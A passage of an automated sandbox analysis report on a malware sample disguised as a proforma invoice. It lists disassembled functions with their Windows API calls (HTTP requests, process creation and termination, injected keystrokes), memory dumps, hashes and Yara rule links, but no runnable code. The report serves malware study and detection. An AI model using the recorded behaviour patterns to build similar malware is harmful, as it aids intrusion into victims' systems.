                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                    • String ID: U
                                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                                    • Opcode ID: 8a7add4a2181444a99adf9f7913cc0daea4abd046e10cd5ae3defae8b71e9c82
                                                                                                                    • Instruction ID: c341f52e1e3c86e00da2b5f04ce672f738478b2186f3ab4bbdf50913904dc419
                                                                                                                    • Opcode Fuzzy Hash: 8a7add4a2181444a99adf9f7913cc0daea4abd046e10cd5ae3defae8b71e9c82
                                                                                                                    • Instruction Fuzzy Hash: 0A710335421206DFCF21AF64C885AEA3BB5FF49321F24827AED555A2E6C7309C64DF60
                                                                                                                    Function 002C1A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002C1A50
                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 002C1A7C
                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 002C1ABE
                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 002C1AD3
                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002C1AE0
                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 002C1B10
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 002C1B57
                                                                                                                      • Part of subcall function 002C2483: GetLastError.KERNEL32(?,?,002C1817,00000000,00000000,00000001), ref: 002C2498
                                                                                                                      • Part of subcall function 002C2483: SetEvent.KERNEL32(?,?,002C1817,00000000,00000000,00000001), ref: 002C24AD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2603140658-3916222277
                                                                                                                    • Opcode ID: 572493ab8e910bd857dd30b834a69da3142f705069e05d3e29031fc62ddf8f1d
                                                                                                                    • Instruction ID: ae6e8e18138945254cd545c0ebe5cb009759f3c2028c801aeb3b8bf8304cb5a1
                                                                                                                    • Opcode Fuzzy Hash: 572493ab8e910bd857dd30b834a69da3142f705069e05d3e29031fc62ddf8f1d
                                                                                                                    • Instruction Fuzzy Hash: 684171B1911219BFEB119F50CC8AFFA77ACEF09354F04422AF9059A141EB709E649BA4
                                                                                                                    Function 002C8C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,002DF910), ref: 002C8D28
                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,002DF910), ref: 002C8D5C
                                                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 002C8ED6
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 002C8F00
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 560350794-0
                                                                                                                    • Opcode ID: 92bd456f62f7de817cc9dad5d700982106f8dd667e140a564ae6b1069b422d2e
                                                                                                                    • Instruction ID: d5dc4f6537e10afbf1afb2051a69e5747397f920e08582e75bdd08edce68c41c
                                                                                                                    • Opcode Fuzzy Hash: 92bd456f62f7de817cc9dad5d700982106f8dd667e140a564ae6b1069b422d2e
                                                                                                                    • Instruction Fuzzy Hash: D3F14971A10209EFCB04DF94C888EAEB7B9FF45315F108598F906AB251DB71AE95CF60
                                                                                                                    Function 002CF694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002CF6B5
                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002CF848
                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002CF86C
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002CF8AC
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002CF8CE
                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002CFA4A
                                                                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 002CFA7C
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 002CFAAB
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 002CFB22
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4090791747-0
                                                                                                                    • Opcode ID: 088ec9e6679778c15a978977b41544c34448965e36065247e1611d2498ab1dc1
                                                                                                                    • Instruction ID: 2403f9567f072a0ec8e29d77e1c0907fa43f3e25022aa90defa9920eebdbf885
                                                                                                                    • Opcode Fuzzy Hash: 088ec9e6679778c15a978977b41544c34448965e36065247e1611d2498ab1dc1
                                                                                                                    • Instruction Fuzzy Hash: 3BE1AF31624201DFCB54EF24C991F6ABBE1AF89354F148A6DF8998B2A1CB30DC55CF52
                                                                                                                    Function 002B4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002B3697,?), ref: 002B468B
                                                                                                                      • Part of subcall function 002B466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002B3697,?), ref: 002B46A4
                                                                                                                      • Part of subcall function 002B4A31: GetFileAttributesW.KERNEL32(?,002B370B), ref: 002B4A32
                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 002B4D40
                                                                                                                    • _wcscmp.LIBCMT ref: 002B4D5A
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 002B4D75
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 793581249-0
                                                                                                                    • Opcode ID: 8669314bc19098f7fadb5207caad431675e80235ab07fc9fb513c27cea909a60
                                                                                                                    • Instruction ID: dc66de7d3ca52bf481eaeaee238ac98760a74a865105bf21fdec7eb1910fd7d6
                                                                                                                    • Opcode Fuzzy Hash: 8669314bc19098f7fadb5207caad431675e80235ab07fc9fb513c27cea909a60
                                                                                                                    • Instruction Fuzzy Hash: 8F5175B24183459BC724EF60D8919EFB3ECAF85350F00492EF589D3152EF74A698CB56
                                                                                                                    Function 002D8645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 002D86FF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InvalidateRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 634782764-0
                                                                                                                    • Opcode ID: 852d626bb08e57688abfdf46d8f29e0e96928eb2075f8b48aeb129faa896378e
                                                                                                                    • Instruction ID: 191e7bbfc60e44affab1e5ada6c7ec0445a4a734c64232edf5e199dcf6a96805
                                                                                                                    • Opcode Fuzzy Hash: 852d626bb08e57688abfdf46d8f29e0e96928eb2075f8b48aeb129faa896378e
                                                                                                                    • Instruction Fuzzy Hash: AE51A134620245BEEB209F28DC89FAD7B69EB05320F604153F951E63E0CB71EDA0DB85
                                                                                                                    Function 00252B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0028C2F7
                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0028C319
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0028C331
                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0028C34F
                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0028C370
                                                                                                                    • DestroyIcon.USER32(00000000), ref: 0028C37F
                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0028C39C
                                                                                                                    • DestroyIcon.USER32(?), ref: 0028C3AB
                                                                                                                      • Part of subcall function 002DA4AF: DeleteObject.GDI32(00000000), ref: 002DA4E8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2819616528-0
                                                                                                                    • Opcode ID: 755a37149a1f35fcbb787640b991b88d59615908858cc5489265c6f0eb3e157b
                                                                                                                    • Instruction ID: 9d70a885e2b852b673e59cc0f985c6a2d19aac3f72f3888c405183b9ad021e51
                                                                                                                    • Opcode Fuzzy Hash: 755a37149a1f35fcbb787640b991b88d59615908858cc5489265c6f0eb3e157b
                                                                                                                    • Instruction Fuzzy Hash: 6351AB74A21206EFDB20EF24DC45FAA77A9EB49311F104529F902972E0D7B0ECA5DB64
                                                                                                                    Function 002A966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002AA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 002AA84C
                                                                                                                      • Part of subcall function 002AA82C: GetCurrentThreadId.KERNEL32 ref: 002AA853
                                                                                                                      • Part of subcall function 002AA82C: AttachThreadInput.USER32(00000000,?,002A9683,?,00000001), ref: 002AA85A
                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 002A968E
                                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002A96AB
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 002A96AE
                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 002A96B7
                                                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 002A96D5
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002A96D8
                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 002A96E1
                                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 002A96F8
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002A96FB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2014098862-0
                                                                                                                    • Opcode ID: 5deab1815638dc40b40258bc1942756301c95804b0d343491a247647a17ac98e
                                                                                                                    • Instruction ID: 6d226f227255975335ed7377e76848914e4ac5c1f409134c59c0ed99f67153a8
                                                                                                                    • Opcode Fuzzy Hash: 5deab1815638dc40b40258bc1942756301c95804b0d343491a247647a17ac98e
                                                                                                                    • Instruction Fuzzy Hash: EB11C271910218BFF6106B61AC4DF6A7B1DDF4D750F100426F655AB0A0C9F29C50DAA8
                                                                                                                    Function 002A8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,002A853C,00000B00,?,?), ref: 002A892A
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,002A853C,00000B00,?,?), ref: 002A8931
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002A853C,00000B00,?,?), ref: 002A8946
                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,002A853C,00000B00,?,?), ref: 002A894E
                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,002A853C,00000B00,?,?), ref: 002A8951
                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,002A853C,00000B00,?,?), ref: 002A8961
                                                                                                                    • GetCurrentProcess.KERNEL32(002A853C,00000000,?,002A853C,00000B00,?,?), ref: 002A8969
                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,002A853C,00000B00,?,?), ref: 002A896C
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,002A8992,00000000,00000000,00000000), ref: 002A8986
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1957940570-0
                                                                                                                    • Opcode ID: 5838325f1fb1cced0414245c542c6aca419f9fe11e1b69494ec56a4f22981ccd
                                                                                                                    • Instruction ID: 3dfa093b84874a979c732c975b5b795382fda15e7fd8a7d1311de21fcdbbe738
                                                                                                                    • Opcode Fuzzy Hash: 5838325f1fb1cced0414245c542c6aca419f9fe11e1b69494ec56a4f22981ccd
                                                                                                                    • Instruction Fuzzy Hash: 0C01AC75641344FFE650ABA5ED4DF673B6CEB89711F408421FA09DB1A1CA70DC008A24
                                                                                                                    Function 002C9B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                    • API String ID: 0-572801152
                                                                                                                    • Opcode ID: 582bebcd469bf368d50a20965037c9334485df26dce11421c5843babdfb7dafa
                                                                                                                    • Instruction ID: f597d305f8f7818b69b93a91894f3d469fd428a77e46a28a8f5d6a228c11fa9f
                                                                                                                    • Opcode Fuzzy Hash: 582bebcd469bf368d50a20965037c9334485df26dce11421c5843babdfb7dafa
                                                                                                                    • Instruction Fuzzy Hash: 40C19171A1020A9FDF10DF98D888FAEB7F5BF58314F15856EE905A7280E7709D90CB90
                                                                                                                    Function 002C975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002A710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?,?,?,002A7455), ref: 002A7127
                                                                                                                      • Part of subcall function 002A710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?,?), ref: 002A7142
                                                                                                                      • Part of subcall function 002A710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?,?), ref: 002A7150
                                                                                                                      • Part of subcall function 002A710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?), ref: 002A7160
                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 002C9806
                                                                                                                    • _memset.LIBCMT ref: 002C9813
                                                                                                                    • _memset.LIBCMT ref: 002C9956
                                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 002C9982
                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 002C998D
                                                                                                                    Strings
                                                                                                                    • NULL Pointer assignment, xrefs: 002C99DB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                    • API String ID: 1300414916-2785691316
                                                                                                                    • Opcode ID: 41959c2d8a7f0b2bbda4b0b5e83448aa3b831e3aaa39d7fbd1f74af2d9ec26ee
                                                                                                                    • Instruction ID: 013a0d7aa72a0fe139255b8640951696c6e7ff63a8ca923a5cfcb68fc4a31a58
                                                                                                                    • Opcode Fuzzy Hash: 41959c2d8a7f0b2bbda4b0b5e83448aa3b831e3aaa39d7fbd1f74af2d9ec26ee
                                                                                                                    • Instruction Fuzzy Hash: 62914871D10229EBDB10DFA5DC44EDEBBB9EF08310F20415AF819A7291DB719A54CFA0
                                                                                                                    Function 002D6D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002D6E24
                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 002D6E38
                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002D6E52
                                                                                                                    • _wcscat.LIBCMT ref: 002D6EAD
                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 002D6EC4
                                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 002D6EF2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window_wcscat
                                                                                                                    • String ID: SysListView32
                                                                                                                    • API String ID: 307300125-78025650
                                                                                                                    • Opcode ID: 6f121051919d465626e0716eab651159a34240e4704f6856fb0ce62e6590515a
                                                                                                                    • Instruction ID: 651316155ec59f9393e2fefa1924c419641d749ca19ab11beec5563bb71d2254
                                                                                                                    • Opcode Fuzzy Hash: 6f121051919d465626e0716eab651159a34240e4704f6856fb0ce62e6590515a
                                                                                                                    • Instruction Fuzzy Hash: FF41BD71A10309EFEB21DF64DC89FEA77A9EF08350F10442BF585A72D1D6729DA48B60
                                                                                                                    Function 002CE933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 002B3C7A
                                                                                                                      • Part of subcall function 002B3C55: Process32FirstW.KERNEL32(00000000,?), ref: 002B3C88
                                                                                                                      • Part of subcall function 002B3C55: CloseHandle.KERNEL32(00000000), ref: 002B3D52
                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002CE9A4
                                                                                                                    • GetLastError.KERNEL32 ref: 002CE9B7
                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002CE9E6
                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 002CEA63
                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 002CEA6E
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 002CEAA3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
